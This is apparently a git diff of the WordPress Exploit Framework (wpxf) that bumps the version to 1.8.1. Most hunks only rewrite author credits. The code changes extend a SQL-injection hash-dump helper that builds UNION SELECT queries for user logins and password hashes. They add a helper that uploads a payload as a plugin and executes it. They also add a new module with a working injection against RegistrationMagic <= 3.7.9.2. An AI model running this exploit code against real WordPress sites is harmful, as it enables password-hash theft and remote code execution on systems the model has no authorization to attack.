diff --git a/VERSION b/VERSION
index 6259340..a8fdfda 100644
--- a/VERSION
+++ b/VERSION
@@ -1 +1 @@
-1.8
+1.8.1
diff --git a/lib/wpxf/wordpress/hash_dump.rb b/lib/wpxf/wordpress/hash_dump.rb
index 12bccf8..ffe472f 100644
--- a/lib/wpxf/wordpress/hash_dump.rb
+++ b/lib/wpxf/wordpress/hash_dump.rb
@@ -29,9 +29,14 @@ def reveals_one_row_per_request
     false
   end
 
+  # @return [Array] an array of values to use in the generated union statement.
+  def hashdump_custom_union_values
+    []
+  end
+
   # @return [String] a unique SQL select statement that can be used to extract the hashes.
   def hashdump_sql_statement
-    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+    cols = hashdump_union_cols
     cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{eof_token})"
 
     query = "select #{cols.join(',')} from #{table_prefix}users"
@@ -40,9 +45,9 @@ def hashdump_sql_statement
     "#{query} limit #{current_row},1"
   end
 
-  # @return [String] a unique SEL select statement that can be used to fingerprint the database prefix.
+  # @return [String] a unique select statement that can be used to fingerprint the database prefix.
   def hashdump_prefix_fingerprint_statement
-    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+    cols = hashdump_union_cols
     cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,table_name,0x3a,#{eof_token})"
 
     query = "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
@@ -100,7 +105,7 @@ def run
 
     @current_row = 0
     emit_info 'Dumping user hashes...'
-    hashes = dump_and_parse_hashes
+    hashes = dump_and_parse_hashes.uniq
     output_hashdump_table(hashes)
 
     export_hashes(hashes) if export_path
@@ -109,6 +114,16 @@ def run
 
   private
 
+  def hashdump_union_cols
+    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+
+    hashdump_custom_union_values.each_with_index do |value, index|
+      cols[index] = value unless value.nil?
+    end
+
+    cols
+  end
+
   def bof_token
     @bof_token
   end
diff --git a/lib/wpxf/wordpress/plugin.rb b/lib/wpxf/wordpress/plugin.rb
index a143212..23040ee 100644
--- a/lib/wpxf/wordpress/plugin.rb
+++ b/lib/wpxf/wordpress/plugin.rb
@@ -7,9 +7,12 @@ module Wpxf::WordPress::Plugin
   # @return [String, nil] the nonce, nil on error.
   def wordpress_plugin_upload_nonce(cookie)
     res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
-    if res && res.code == 200
+
+    if res&.code == 200
       return res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
     end
+
+    nil
   end
 
   # Create and upload a plugin that encapsulates the current payload.
@@ -22,11 +25,29 @@ def wordpress_upload_payload_plugin(name, payload_name, cookie)
     return false if nonce.nil?
 
     res = wordpress_upload_plugin(name, payload_name, cookie, nonce)
-    if res && res.code == 200
-      return true
-    else
-      return false
+    res&.code == 200
+  end
+
+  # Upload and execute a payload as a plugin.
+  # @param plugin_name [String] the name of the plugin.
+  # @param payload_name [String] the name the payload should use on the server.
+  # @param cookie [String] a valid admin session cookie.
+  # @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the request.
+  def wordpress_upload_and_execute_payload_plugin(plugin_name, payload_name, cookie)
+    unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
+      emit_error 'Failed to upload the payload'
+      return nil
     end
+
+    payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    emit_info "Executing the payload at #{payload_url}..."
+    res = execute_get_request(url: payload_url)
+
+    if res&.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+
+    res
   end
 
   # Generate a valid WordPress plugin header / base file.
diff --git a/lib/wpxf/wordpress/urls.rb b/lib/wpxf/wordpress/urls.rb
index 97e58f8..848a7af 100644
--- a/lib/wpxf/wordpress/urls.rb
+++ b/lib/wpxf/wordpress/urls.rb
@@ -123,4 +123,9 @@ def wordpress_url_rest_api
   def wordpress_url_comments_post
     normalize_uri(full_uri, 'wp-comments-post.php')
   end
+
+  # @return [String] the admin / plugin options URL.
+  def wordpress_url_admin_options
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
 end
diff --git a/modules/auxiliary/ad_widget_php_file_download.rb b/modules/auxiliary/ad_widget_php_file_download.rb
index 1e56f80..bd4eec1 100644
--- a/modules/auxiliary/ad_widget_php_file_download.rb
+++ b/modules/auxiliary/ad_widget_php_file_download.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Ad-Widget <= 2.11.0 Authenticated PHP File Download',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating' # WPXF module
       ],
       references: [
         ['WPVDB', '8789']
diff --git a/modules/auxiliary/all_in_one_migration_export.rb b/modules/auxiliary/all_in_one_migration_export.rb
index 6509882..e9a10ae 100644
--- a/modules/auxiliary/all_in_one_migration_export.rb
+++ b/modules/auxiliary/all_in_one_migration_export.rb
@@ -14,8 +14,8 @@ def initialize
         All-in-One Migration plugin in versions < 2.0.5.
       ),
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '7857'],
diff --git a/modules/auxiliary/antioch_arbitrary_file_download.rb b/modules/auxiliary/antioch_arbitrary_file_download.rb
index ae32ebf..6c951f5 100644
--- a/modules/auxiliary/antioch_arbitrary_file_download.rb
+++ b/modules/auxiliary/antioch_arbitrary_file_download.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Antioch Theme Arbitrary File Download',
       author: [
-        'Ashiyane Digital Security Team',  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Ashiyane Digital Security Team', # Disclosure
+        'rastating'                       # WPXF module
       ],
       references: [
         ['WPVDB', '8406']
diff --git a/modules/auxiliary/candidate_application_form_arbitrary_file_download.rb b/modules/auxiliary/candidate_application_form_arbitrary_file_download.rb
index cbdafe4..bbae259 100644
--- a/modules/auxiliary/candidate_application_form_arbitrary_file_download.rb
+++ b/modules/auxiliary/candidate_application_form_arbitrary_file_download.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Candidate Application Form Arbitrary File Download',
       author: [
-        'Larry W. Cashdollar',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['EDB', '37754']
diff --git a/modules/auxiliary/cp_image_store_arbitrary_file_download.rb b/modules/auxiliary/cp_image_store_arbitrary_file_download.rb
index b53daf3..e53ab5a 100644
--- a/modules/auxiliary/cp_image_store_arbitrary_file_download.rb
+++ b/modules/auxiliary/cp_image_store_arbitrary_file_download.rb
@@ -14,8 +14,8 @@ def initialize
         file accessible by the user the web server is running as.
       ),
       author: [
-        'Joaquin Ramirez Martinez',        # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Joaquin Ramirez Martinez', # Disclosure
+        'rastating'                 # WPXF module
       ],
       references: [
         ['EDB', '37559']
diff --git a/modules/auxiliary/custom_contact_forms_privilege_escalation.rb b/modules/auxiliary/custom_contact_forms_privilege_escalation.rb
index 8c0cf94..3fe74ae 100644
--- a/modules/auxiliary/custom_contact_forms_privilege_escalation.rb
+++ b/modules/auxiliary/custom_contact_forms_privilege_escalation.rb
@@ -13,8 +13,8 @@ def initialize
             '5.1.0.3, allows unauthenticated users to create new admin users '\
             'due to lack of validation when uploading SQL files.',
       author: [
-        'Marc-Alexandre Montpas',          # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Marc-Alexandre Montpas', # Vulnerability discovery
+        'rastating'               # WPXF module
       ],
       references: [
         ['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'],
diff --git a/modules/auxiliary/direct_download_for_woocommerce_file_download.rb b/modules/auxiliary/direct_download_for_woocommerce_file_download.rb
index ed19184..6b0c459 100644
--- a/modules/auxiliary/direct_download_for_woocommerce_file_download.rb
+++ b/modules/auxiliary/direct_download_for_woocommerce_file_download.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Direct Download for WooCommerce <= 1.15 File Download',
       author: [
-        'Diego Celdran Morell',           # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Diego Celdran Morell', # Disclosure
+        'rastating'             # WPXF module
       ],
       references: [
         ['WPVDB', '8724']
diff --git a/modules/auxiliary/download_manager_authenticated_privilege_escalation.rb b/modules/auxiliary/download_manager_authenticated_privilege_escalation.rb
index 2020f8a..21a8c5a 100644
--- a/modules/auxiliary/download_manager_authenticated_privilege_escalation.rb
+++ b/modules/auxiliary/download_manager_authenticated_privilege_escalation.rb
@@ -12,8 +12,8 @@ def initialize
             'allows authenticated users to escalate their user role to '\
             'that of an administrator.',
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8365'],
diff --git a/modules/auxiliary/download_manager_directory_listing_disclosure.rb b/modules/auxiliary/download_manager_directory_listing_disclosure.rb
index 6d903b6..81e6e39 100644
--- a/modules/auxiliary/download_manager_directory_listing_disclosure.rb
+++ b/modules/auxiliary/download_manager_directory_listing_disclosure.rb
@@ -16,8 +16,8 @@ def initialize
             'versions < 2.8.3 of the Download Manager plugin to get '\
             'the directory listing of the specified directory.',
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8365'],
diff --git a/modules/auxiliary/download_manager_privilege_escalation.rb b/modules/auxiliary/download_manager_privilege_escalation.rb
index 8a5e1d6..5ec47c3 100644
--- a/modules/auxiliary/download_manager_privilege_escalation.rb
+++ b/modules/auxiliary/download_manager_privilege_escalation.rb
@@ -15,8 +15,8 @@ def initialize
             'allows unauthenticated users to create new admin users '\
             'due to lack of validation wpdm_ajax_call_exec.',
       author: [
-        'Mickael Nadeau',                 # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Mickael Nadeau', # Vulnerability discovery
+        'rastating'       # WPXF module
       ],
       references: [
         ['EDB', '35533'],
diff --git a/modules/auxiliary/download_monitor_log_export.rb b/modules/auxiliary/download_monitor_log_export.rb
index bbfe3f1..f86a6aa 100644
--- a/modules/auxiliary/download_monitor_log_export.rb
+++ b/modules/auxiliary/download_monitor_log_export.rb
@@ -15,8 +15,8 @@ def initialize
         includes: Download ID, Version ID, Filename, User ID, User Login, User Email, User IP, User Agent, Date, Status
       ),
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8810']
diff --git a/modules/auxiliary/duplicator_csrf_db_export.rb b/modules/auxiliary/duplicator_csrf_db_export.rb
index 96928e0..c1c3fa6 100644
--- a/modules/auxiliary/duplicator_csrf_db_export.rb
+++ b/modules/auxiliary/duplicator_csrf_db_export.rb
@@ -15,8 +15,8 @@ def initialize
         visits the generated web page.
       ),
       author: [
-        'RatioSec Research',              # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'RatioSec Research', # Discovery and disclosure
+        'rastating'          # WPXF module
       ],
       references: [
         ['WPVDB', '8388'],
diff --git a/modules/auxiliary/easy_cart_privilege_escalation.rb b/modules/auxiliary/easy_cart_privilege_escalation.rb
index 5426d87..607bac1 100644
--- a/modules/auxiliary/easy_cart_privilege_escalation.rb
+++ b/modules/auxiliary/easy_cart_privilege_escalation.rb
@@ -22,7 +22,7 @@ def initialize
             'a new account with admin privileges via the default registration '\
             'page found at /wp-login.php?action=register.',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # Discovery and WPXF module
+        'rastating' # Discovery and WPXF module
       ],
       references: [
         ['CVE', '2015-2673'],
diff --git a/modules/auxiliary/email_users_csrf_bulk_mail.rb b/modules/auxiliary/email_users_csrf_bulk_mail.rb
index a0787f9..8031037 100644
--- a/modules/auxiliary/email_users_csrf_bulk_mail.rb
+++ b/modules/auxiliary/email_users_csrf_bulk_mail.rb
@@ -12,8 +12,8 @@ def initialize
             'the Email Users plugin, which allows for the sending of a bulk e-mail to '\
             'all users of a specified role.',
       author: [
-        'Julien Rentrop',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Julien Rentrop', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8601'],
diff --git a/modules/auxiliary/events_hash_dump.rb b/modules/auxiliary/events_hash_dump.rb
index 5ddd093..0392409 100644
--- a/modules/auxiliary/events_hash_dump.rb
+++ b/modules/auxiliary/events_hash_dump.rb
@@ -15,8 +15,8 @@ def initialize
         to dump the hashed passwords of all users in the database.
       ),
       author: [
-        'Lenon Leite',                     # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Lenon Leite', # Disclosure
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8954'],
diff --git a/modules/auxiliary/gallery_album_hash_dump.rb b/modules/auxiliary/gallery_album_hash_dump.rb
index bffe9a1..b36e143 100644
--- a/modules/auxiliary/gallery_album_hash_dump.rb
+++ b/modules/auxiliary/gallery_album_hash_dump.rb
@@ -15,8 +15,8 @@ def initialize
         to dump the hashed passwords of all users in the database.
       ),
       author: [
-        'Manuel Garcia Cardenas',          # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Manuel Garcia Cardenas', # Disclosure
+        'rastating'               # WPXF module
       ],
       references: [
         ['WPVDB', '8907'],
diff --git a/modules/auxiliary/ghost_unrestricted_export_download.rb b/modules/auxiliary/ghost_unrestricted_export_download.rb
index 052aa19..23abe49 100644
--- a/modules/auxiliary/ghost_unrestricted_export_download.rb
+++ b/modules/auxiliary/ghost_unrestricted_export_download.rb
@@ -12,8 +12,8 @@ def initialize
             '<= 0.5.5 of the Ghost plugin to download an export of the WordPress '\
             'data, including usernames and e-mail addresses.',
       author: [
-        'Josh Brody',                      # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Josh Brody', # Disclosure
+        'rastating'   # WPXF module
       ],
       references: [
         ['WPVDB', '8479']
diff --git a/modules/auxiliary/history_collection_arbitrary_file_download.rb b/modules/auxiliary/history_collection_arbitrary_file_download.rb
index f9a43ee..7546d6f 100644
--- a/modules/auxiliary/history_collection_arbitrary_file_download.rb
+++ b/modules/auxiliary/history_collection_arbitrary_file_download.rb
@@ -14,8 +14,8 @@ def initialize
         file accessible by the user the web server is running as.
       ),
       author: [
-        'Kuroi\'SH',                      # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Kuroi\'SH', # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['EDB', '37254']
diff --git a/modules/auxiliary/imdb_profile_widget_arbitrary_file_download.rb b/modules/auxiliary/imdb_profile_widget_arbitrary_file_download.rb
index 053c59f..5b73419 100644
--- a/modules/auxiliary/imdb_profile_widget_arbitrary_file_download.rb
+++ b/modules/auxiliary/imdb_profile_widget_arbitrary_file_download.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'IMDb Profile Widget <= 1.0.8 Arbitrary File Download',
       author: [
-        'CrashBandicot @DosPerl',          # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'CrashBandicot @DosPerl', # Disclosure
+        'rastating'               # WPXF module
       ],
       references: [
         ['WPVDB', '8426'],
diff --git a/modules/auxiliary/jtrt_responsive_tables_hash_dump.rb b/modules/auxiliary/jtrt_responsive_tables_hash_dump.rb
index a062b6b..7a63aa9 100644
--- a/modules/auxiliary/jtrt_responsive_tables_hash_dump.rb
+++ b/modules/auxiliary/jtrt_responsive_tables_hash_dump.rb
@@ -16,8 +16,8 @@ def initialize
         of all users in the database.
       ),
       author: [
-        'Lenon Leite',                    # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Lenon Leite', # Disclosure
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8953'],
diff --git a/modules/auxiliary/long_password_dos.rb b/modules/auxiliary/long_password_dos.rb
index 2845ece..3795862 100644
--- a/modules/auxiliary/long_password_dos.rb
+++ b/modules/auxiliary/long_password_dos.rb
@@ -16,9 +16,9 @@ def initialize
             'of service via a long password that is improperly handled during '\
             'hashing.',
       author: [
-        'Javier Nieto Arevalo', # Vulnerability disclosure
+        'Javier Nieto Arevalo',  # Vulnerability disclosure
         'Andres Rojas Guerrero', # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating'              # WPXF module
       ],
       references: [
         ['CVE', '2014-9034'],
diff --git a/modules/auxiliary/mail_masta_unauthenticated_local_file_inclusion.rb b/modules/auxiliary/mail_masta_unauthenticated_local_file_inclusion.rb
index ceb2efd..ea22575 100644
--- a/modules/auxiliary/mail_masta_unauthenticated_local_file_inclusion.rb
+++ b/modules/auxiliary/mail_masta_unauthenticated_local_file_inclusion.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Mail Masta Unauthenticated Local File Inclusion',
       author: [
-        'Guillermo Garcia Marcos',         # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Guillermo Garcia Marcos', # Disclosure
+        'rastating'                # WPXF module
       ],
       desc: 'This module exploits a vulnerability which allows you to include any arbitrary file '\
             'accessible by the user the web server is running as into the executing script.',
diff --git a/modules/auxiliary/membership_simplified_arbitrary_file_download.rb b/modules/auxiliary/membership_simplified_arbitrary_file_download.rb
index c33725a..828f3d3 100644
--- a/modules/auxiliary/membership_simplified_arbitrary_file_download.rb
+++ b/modules/auxiliary/membership_simplified_arbitrary_file_download.rb
@@ -14,8 +14,8 @@ def initialize
         in order to bypass mitigation within the plugin.
       ),
       author: [
-        'Larry W. Cashdollar',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['CVE', '2017-1002008'],
diff --git a/modules/auxiliary/memphis_documents_library_arbitrary_file_download.rb b/modules/auxiliary/memphis_documents_library_arbitrary_file_download.rb
index 06d674a..42de9d9 100644
--- a/modules/auxiliary/memphis_documents_library_arbitrary_file_download.rb
+++ b/modules/auxiliary/memphis_documents_library_arbitrary_file_download.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Memphis Documents Library <= 3.1.5 Arbitrary File Download',
       author: [
-        'Felipe Molina',                   # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Felipe Molina', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8419']
diff --git a/modules/auxiliary/platform_privilege_escalation.rb b/modules/auxiliary/platform_privilege_escalation.rb
index e8c2436..bb0b985 100644
--- a/modules/auxiliary/platform_privilege_escalation.rb
+++ b/modules/auxiliary/platform_privilege_escalation.rb
@@ -21,8 +21,8 @@ def initialize
             'privileges via the default registration page found at '\
             '/wp-login.php?action=register.',
       author: [
-        'Marc-Alexandre Montpas',         # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Marc-Alexandre Montpas', # Vulnerability discovery
+        'rastating'               # WPXF module
       ],
       references: [
         ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
diff --git a/modules/auxiliary/post_grid_file_deletion.rb b/modules/auxiliary/post_grid_file_deletion.rb
index 14bd6c5..91bd751 100644
--- a/modules/auxiliary/post_grid_file_deletion.rb
+++ b/modules/auxiliary/post_grid_file_deletion.rb
@@ -12,8 +12,8 @@ def initialize
             'the Post Grid plugin which allows you to delete any arbitrary '\
             'file accessible by the user the web server is running as.',
       author: [
-        'White Fir Design',                # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'White Fir Design', # Disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8667'],
diff --git a/modules/auxiliary/qards_local_port_scan.rb b/modules/auxiliary/qards_local_port_scan.rb
index 5196cfa..973b2a3 100644
--- a/modules/auxiliary/qards_local_port_scan.rb
+++ b/modules/auxiliary/qards_local_port_scan.rb
@@ -13,8 +13,8 @@ def initialize
         enables a remote user to check if a service is running on a local port.
       ),
       author: [
-        'theMiddle',                      # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'theMiddle', # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8933']
diff --git a/modules/auxiliary/recent_backups_arbitrary_file_download.rb b/modules/auxiliary/recent_backups_arbitrary_file_download.rb
index af72152..73af56f 100644
--- a/modules/auxiliary/recent_backups_arbitrary_file_download.rb
+++ b/modules/auxiliary/recent_backups_arbitrary_file_download.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Recent Backups Arbitrary File Download',
       author: [
-        'Larry W. Cashdollar',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8122'],
diff --git a/modules/auxiliary/registrationmagic_hash_dump.rb b/modules/auxiliary/registrationmagic_hash_dump.rb
new file mode 100644
index 0000000..8728c03
--- /dev/null
+++ b/modules/auxiliary/registrationmagic_hash_dump.rb
@@ -0,0 +1,62 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::RegistrationMagicHashDump < Wpxf::Module
+  include Wpxf::WordPress::HashDump
+
+  def initialize
+    super
+
+    update_info(
+      name: 'RegistrationMagic - Custom Registration Forms <= 3.7.9.2 Authenticated Hash Dump',
+      desc: %(
+        RegistrationMagic - Custom Registration Forms <= 3.7.9.2 suffers from an
+        SQL injection vulnerability which is exploitable by registered users with the
+        required privileges to manage the plugin.
+
+        This module utilises the vulnerability to dump the hashed passwords
+        of all users in the database.
+      ),
+      author: [
+        'rastating' # Disclosure + WPXF module
+      ],
+      references: [
+        ['WPVDB', '8975'],
+        ['URL', 'https://www.rastating.com/registrationmagic-custom-registration-forms-3-7-9-2-authenticated-sql-injection']
+      ],
+      date: 'Dec 10 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('custom-registration-form-builder-with-submission-manager', '3.7.9.3')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def hashdump_request_params
+    {
+      'page'       => 'rm_field_manage',
+      'rm_form_id' => "-#{Utility::Text.rand_numeric(2)} UNION #{hashdump_sql_statement}"
+    }
+  end
+
+  def hashdump_custom_union_values
+    values = Array.new(11)
+    values[4] = 'concat(0x54,0x65,0x78,0x74,0x62,0x6f,0x78)'
+    values
+  end
+
+  def hashdump_visible_field_index
+    3
+  end
+
+  def hashdump_number_of_cols
+    11
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+end
diff --git a/modules/auxiliary/simple_ads_manager_sql_injection.rb b/modules/auxiliary/simple_ads_manager_sql_injection.rb
index 8f81f61..ba99c63 100644
--- a/modules/auxiliary/simple_ads_manager_sql_injection.rb
+++ b/modules/auxiliary/simple_ads_manager_sql_injection.rb
@@ -16,8 +16,8 @@ def initialize
             'allows unauthenticated users to view a single field of '\
             'data at a time, such as e-mails and passwords.',
       author: [
-        'Kacper Szurek',                  # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Kacper Szurek', # Vulnerability discovery
+        'rastating'      # WPXF module
       ],
       references: [
         ['URL', 'http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html'],
diff --git a/modules/auxiliary/simple_download_monitor_file_disclosure.rb b/modules/auxiliary/simple_download_monitor_file_disclosure.rb
index ca072dc..42eb377 100644
--- a/modules/auxiliary/simple_download_monitor_file_disclosure.rb
+++ b/modules/auxiliary/simple_download_monitor_file_disclosure.rb
@@ -15,8 +15,8 @@ def initialize
         to bypass the password protection on private downloads.
       ),
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8364'],
diff --git a/modules/auxiliary/simple_download_monitor_file_download.rb b/modules/auxiliary/simple_download_monitor_file_download.rb
index 5799089..f52ca41 100644
--- a/modules/auxiliary/simple_download_monitor_file_download.rb
+++ b/modules/auxiliary/simple_download_monitor_file_download.rb
@@ -15,8 +15,8 @@ def initialize
         auxiliary/simple_download_monitor_file_disclosure module.
       ),
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8364'],
diff --git a/modules/auxiliary/simple_events_calendar_hash_dump.rb b/modules/auxiliary/simple_events_calendar_hash_dump.rb
index 420b0c7..da52f01 100644
--- a/modules/auxiliary/simple_events_calendar_hash_dump.rb
+++ b/modules/auxiliary/simple_events_calendar_hash_dump.rb
@@ -15,8 +15,8 @@ def initialize
         to dump the hashed passwords of all users in the database.
       ),
       author: [
-        'Lenon Leite',                     # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Lenon Leite', # Disclosure
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8955'],
diff --git a/modules/auxiliary/simple_image_manipulator_arbitrary_file_download.rb b/modules/auxiliary/simple_image_manipulator_arbitrary_file_download.rb
index 9aef277..e302576 100644
--- a/modules/auxiliary/simple_image_manipulator_arbitrary_file_download.rb
+++ b/modules/auxiliary/simple_image_manipulator_arbitrary_file_download.rb
@@ -12,8 +12,8 @@ def initialize
             'Simple Image Manipulator plugin which allows you to download any '\
             'arbitrary file accessible by the user the web server is running as.',
       author: [
-        'Larry W. Cashdollar',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8123'],
diff --git a/modules/auxiliary/sql_shortcode_hash_dump.rb b/modules/auxiliary/sql_shortcode_hash_dump.rb
index c2d2071..2229f22 100644
--- a/modules/auxiliary/sql_shortcode_hash_dump.rb
+++ b/modules/auxiliary/sql_shortcode_hash_dump.rb
@@ -16,8 +16,8 @@ def initialize
         of all users in the database.
       ),
       author: [
-        'Paul Dannewitz',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Paul Dannewitz', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8904']
diff --git a/modules/auxiliary/ultimate_csv_importer_user_extract.rb b/modules/auxiliary/ultimate_csv_importer_user_extract.rb
index 785a53a..d6e1c7b 100644
--- a/modules/auxiliary/ultimate_csv_importer_user_extract.rb
+++ b/modules/auxiliary/ultimate_csv_importer_user_extract.rb
@@ -20,8 +20,8 @@ def initialize
         hashed passwords and email addresses for all users.
       ),
       author: [
-        'James Hooker',                    # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Hooker', # Disclosure
+        'rastating'     # WPXF module
       ],
       references: [
         ['WPVDB', '7778']
diff --git a/modules/auxiliary/ultimate_product_catalogue_hash_dump.rb b/modules/auxiliary/ultimate_product_catalogue_hash_dump.rb
index 3398434..9ca4fa1 100644
--- a/modules/auxiliary/ultimate_product_catalogue_hash_dump.rb
+++ b/modules/auxiliary/ultimate_product_catalogue_hash_dump.rb
@@ -15,8 +15,8 @@ module utilises this vulnerability to dump the hashed passwords of all
         users in the database.
       ),
       author: [
-        'Lenon Leite',                     # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Lenon Leite', # Disclosure
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8853'],
diff --git a/modules/auxiliary/user_meta_manager_information_disclosure.rb b/modules/auxiliary/user_meta_manager_information_disclosure.rb
index 81bbf1f..c4bd1de 100644
--- a/modules/auxiliary/user_meta_manager_information_disclosure.rb
+++ b/modules/auxiliary/user_meta_manager_information_disclosure.rb
@@ -15,8 +15,8 @@ def initialize
         in order to get all the contents of the `usermeta` table.
       ),
       author: [
-        'Panagiotis Vagenas',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Panagiotis Vagenas', # Disclosure
+        'rastating'           # WPXF module
       ],
       references: [
         ['WPVDB', '8384'],
diff --git a/modules/auxiliary/user_meta_manager_privilege_escalation.rb b/modules/auxiliary/user_meta_manager_privilege_escalation.rb
index f9e973c..c8c2c7f 100644
--- a/modules/auxiliary/user_meta_manager_privilege_escalation.rb
+++ b/modules/auxiliary/user_meta_manager_privilege_escalation.rb
@@ -12,8 +12,8 @@ def initialize
             '3.4.6, allows authenticated users of any level to update the '\
             'role of any user to be an administrator.',
       author: [
-        'Panagiotis Vagenas',              # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Panagiotis Vagenas', # Vulnerability discovery
+        'rastating'           # WPXF module
       ],
       references: [
         ['URL', 'http://seclists.org/bugtraq/2016/Feb/34'],
diff --git a/modules/auxiliary/user_role_editor_privilege_escalation.rb b/modules/auxiliary/user_role_editor_privilege_escalation.rb
index ae5622c..8d153ac 100644
--- a/modules/auxiliary/user_role_editor_privilege_escalation.rb
+++ b/modules/auxiliary/user_role_editor_privilege_escalation.rb
@@ -12,7 +12,7 @@ def initialize
             'allows authenticated users to escalate their user role to '\
